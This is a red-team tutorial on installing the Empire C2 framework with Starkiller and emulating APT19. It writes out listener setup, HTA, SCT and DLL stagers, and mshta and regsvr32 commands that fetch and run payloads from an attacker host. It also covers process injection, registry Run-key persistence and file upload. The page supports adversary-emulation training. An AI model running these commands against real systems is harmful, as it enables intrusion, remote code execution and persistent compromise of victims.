# Empire3 Demo of Empire with Starkiller is in this [Red Team Village](https://redteamvillage.io/) event video where I emulate APT19: {% embed url="" %} ## Install Empire Install on Kali: ``` sudo apt install powershell-empire ``` Install on Ubuntu: ``` cd /opt sudo git clone https://github.com/BC-SECURITY/Empire.git cd Empire sudo ./setup/install.sh ``` If you are installing the newer version of Empire on the SANS Slingshot C2 Matrix Edition VM, there is a small bug because it wants Ubuntu 20.04 but slingshot is in 18.04. Replace the line in setup/install.sh with the correct version: `wget -q` [`https://packages.microsoft.com/config/ubuntu/18.04/packages-microsoft-prod.deb`](https://packages.microsoft.com/config/ubuntu/18.04/packages-microsoft-prod.deb) And comment the version test: `#if [ $VERSION_ID != "20.04" ]; then # echo -e '\x1b[1;31m[!] Ubuntu must be 20.04\x1b[0m' && exit #fi` Download Starkiller if you want a GUI: ``` cd /opt sudo wget https://github.com/BC-SECURITY/Starkiller/releases/download/v1.0.0/starkiller-1.0.0.AppImage sudo chmod +x starkiller-1.0.0.AppImage ``` ## Run Empire ```bash sudo empire ``` On Kali: ```bash sudo powershell-empire ``` ## Run Starkiller Run Empire for connectivity through Starkiller if you want a GUI: ```bash sudo empire --rest --username --password ``` Open Starkiller: ```bash cd /opt/starkiller ./starkiller-1.2.2.AppImage ``` Login to Starkiller: * Name: localhost:1337 * Username: \ * Password: \ ## Emulating TTPs Will use an adversary emulation plan for APT19 as an example: | Tactic | Description | | ------------------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | Description | APT19 is a Chinese-based threat group that has targeted a variety of industries, including defense, finance, energy, pharmaceutical, telecommunications, high tech, education, manufacturing, and legal services. | | Goal and Intent | Exist in the network to enumerate systems and information in order to maintain Command and Control to support future attacks. | | Command and Control | Commonly Used Port (T1043) - TCP port 80; Standard Application Layer Protocol (T1071) - HTTP; Deobfuscate/Decode Files or Information (T1140); Data Encoding (T1132) - used Base64 to encode communications to the C2 server | | Initial Access | Spearphishing attachment (T1193); Spearphishing link (T1192) | | Execution | PowerShell (T1086); User Execution; Hidden Windows (T1143) - used `-W Hidden` to conceal PowerShell windows by setting the WindowStyle parameter to hidden; Obfuscated Files or Information (T1027) - used Base64 to obfuscate commands and the payload; DLL Side-Loading (T1073) | | Discover | System Owner/User Discovery (T1033); System Information Discovery (T1082) System Network Configuration Discovery (T1016) | | Persistence | Registry Run Keys/ Start up Folder (T1060) - establishes persistence by setting the Registry key `HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Windows Debug Tools-%LOCALAPPDATA%\` | | Defense Evasion | Regsvr32 (T1117); Scripting (T1064) - downloaded and launched code within a SCT file to bypass application whitelisting techniques | ### Listeners Create Listener ```bash Type: http Name: http Host: http://10.0.0.187 Port: 80 BindIP: 10.0.0.187 Jitter: 0.5 StagingKey: georgy ``` ### Stagers Generate Stager HTA: ```bash Type: windows/hta Listner: http Base64: True Language: powershell Outfile: /tmp/Resume.hta ``` Generate Stager SCT: ```bash Type: windows/launcher_sct Listner: http Base64: True Language: powershell ``` Generate Stager DLL: ```bash Type: windows/dll Listner: http Arch: x86 Language: powershell OutFile: /tmp/launcher.dll Optional Fields Obfuscate: True ObfuscateCommand: Token\String\1 ``` Download the stagers to /tmp and serve with SimpleHTTPServer ```bash cd /tmp python -m SimpleHTTPServer 8080 ``` ### Initial Access Email with link to Resume.hta ### Execution Show execution of HTA file: ```bash mshta http://10.0.0.187:8080/Resume.hta ``` Migrate to another process with reflective PE Injection: ```bash See processes running: ps usemodule code_execution/invoke_reflectivepeinjection set ProcID: set DllPath: /tmp/launcher.dll ``` ### Discovery ```bash whoami usemodule situational_awareness/host/antivirusproduct usemodule situational_awareness/host/get_uaclevel usemodule situational_awareness/host/winenum ``` ### Persistence ```bash usemodule persistence/userland/registry set Listener: http ``` Open regedit HKCU\Software\Microsoft\Windows\CurrentVersion ### Defense Evasion Execution with regsvr32 and scripting. Created a shortcut called Chrome with Target set as: ```bash C:\Windows\System32\cmd.exe /c "C:\Windows\System32\regsvr32.exe /s /n /u /i:http:\10.0.0.187:8080\launcher.sct scrobj.dll" ``` ### Upload ```bash cd C:\Users\ upload /tmp/file shell C:\Users\\ ``` ## Other Resources * Using Empire with Starkiller: [How to from BC-Security](https://www.bc-security.org/post/an-introduction-to-starkiller)